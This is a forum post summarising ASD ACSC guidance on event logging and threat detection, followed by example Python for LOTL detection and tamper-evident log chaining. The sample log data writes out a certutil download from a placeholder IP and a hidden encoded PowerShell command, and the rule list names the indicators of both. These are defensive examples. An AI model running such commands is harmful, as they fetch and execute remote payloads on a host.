Top Threats

ASD ACSC Joint Publication Best practices for event logging and threat detection

  • 1.  ASD ACSC Joint Publication Best practices for event logging and threat detection

    Posted Aug 22, 2024 04:00:00 AM

    Hi All,

    This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) in cooperation with the following international partners:

    Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility. This guidance makes recommendations that improve an organization's resilience in the current cyber threat environment with regard to resourcing constraints. It is of moderate technical complexity and assumes a basic understanding of event logging.

    An effective event logging solution aims to:

    • send alerts to the network defenders responsible for monitoring when cyber security events such as critical software configuration changes are made or new software solutions are deployed
    • identify cyber security events that may indicate a cyber security incident, such as malicious actors employing living off the land (LOTL) techniques or lateral movement post-compromise
    • support incident response by revealing the scope and extent of a compromise
    • monitor account compliance with organizational policies
    • reduce alert noise, saving on costs associated with storage and query time
    • enable network defenders to make agile and informed decisions based on prioritization of alerts and analytics
    • ensure logs and the logging platforms are useable and performant for analysts.

    There are four key factors to consider when pursuing logging best practices:

    1. enterprise-approved event logging policy
    2. centralised event log access and correlation 
    3. secure storage and event log integrity
    4. detection strategy for relevant threats.



    ------------------------------
    Michael Roza CPA, CISA, CIA, CC, CCSKv5, CCZTv1, MBA, EMBA, CSA
    ------------------------------
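As an added illustration of two of the factors listed in the post above (event log integrity, and a detection strategy for LOTL techniques), the following Python is example code written for this page; it is not from the post or from the ASD ACSC publication. The log records, field names and LOTL indicator rules are constructed for the demonstration and do not follow any vendor schema.

```python
"""Tamper-evident log store plus a small LOTL detection pass over constructed records."""
import hashlib
import hmac
import json

# Constructed sample process-creation events (hypothetical field names, not a real schema).
SAMPLE_EVENTS = [
    {"ts": "2024-08-22T04:00:01Z", "host": "ws01", "user": "alice", "event": "process_create",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"ts": "2024-08-22T04:00:07Z", "host": "ws01", "user": "alice", "event": "process_create",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"ts": "2024-08-22T04:00:09Z", "host": "ws01", "user": "alice", "event": "process_create",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"ts": "2024-08-22T04:00:12Z", "host": "ws01", "user": "SYSTEM", "event": "process_create",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Hypothetical LOTL rules: (binary name, argument indicators, description).
LOTL_RULES = [
    ("certutil.exe", ("-urlcache", "-decode"), "certutil used to fetch or decode a payload"),
    ("powershell.exe", ("-enc", "-encodedcommand", "downloadstring"), "encoded or downloading PowerShell"),
    ("mshta.exe", ("http",), "mshta executing remote content"),
    ("rundll32.exe", ("javascript:", "http"), "rundll32 executing script or remote content"),
]


def detect_lotl(events):
    """Return one hit per process-creation event whose image and arguments match a LOTL rule."""
    hits = []
    for e in events:
        if e.get("event") != "process_create":
            continue
        image = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"].lower()
        for binary, indicators, desc in LOTL_RULES:
            if image == binary and any(ind in cmd for ind in indicators):
                hits.append({"ts": e["ts"], "host": e["host"], "rule": desc, "cmdline": e["cmdline"]})
    return hits


class HashChainedLog:
    """Append-only store: each record carries an HMAC over itself and the previous record's tag,
    so modifying, reordering or deleting an interior record breaks every later tag."""

    GENESIS = "0" * 64

    def __init__(self, key: bytes):
        self._key = key
        self.records = []

    def _tag(self, prev_tag: str, event: dict) -> str:
        canonical = json.dumps(event, sort_keys=True, separators=(",", ":")).encode()
        return hmac.new(self._key, prev_tag.encode() + canonical, hashlib.sha256).hexdigest()

    def append(self, event: dict) -> None:
        prev = self.records[-1]["tag"] if self.records else self.GENESIS
        event = dict(event)  # store a copy so callers cannot mutate the chained record
        self.records.append({"event": event, "tag": self._tag(prev, event)})

    def verify(self) -> int:
        """Return the index of the first record whose tag does not verify, or -1 if intact."""
        prev = self.GENESIS
        for i, rec in enumerate(self.records):
            if not hmac.compare_digest(rec["tag"], self._tag(prev, rec["event"])):
                return i
            prev = rec["tag"]
        return -1


def build_store(events, key: bytes = b"example-hmac-key-rotate-me") -> HashChainedLog:
    """Ingest events into a fresh chained store (key is a placeholder for this example)."""
    store = HashChainedLog(key)
    for e in events:
        store.append(e)
    return store


def tampered_store() -> HashChainedLog:
    """Simulate an intruder editing the stored certutil record to hide the download."""
    store = build_store(SAMPLE_EVENTS)
    store.records[1]["event"]["cmdline"] = "certutil.exe -dump"
    return store


if __name__ == "__main__":
    for hit in detect_lotl(SAMPLE_EVENTS):
        print(f"ALERT {hit['ts']} {hit['host']}: {hit['rule']} :: {hit['cmdline']}")
    print("intact chain verifies at index", build_store(SAMPLE_EVENTS).verify())
    print("tampered chain first fails at index", tampered_store().verify())
```

Two caveats follow from the design. The chain proves nothing about records appended after the last tag an independent party has seen, so the latest tag should be forwarded to the central collector (or a second system) so that truncation of the tail is detectable; and the HMAC key must live with the collector rather than on the log source, otherwise an actor who has compromised the host can simply re-chain the edited records.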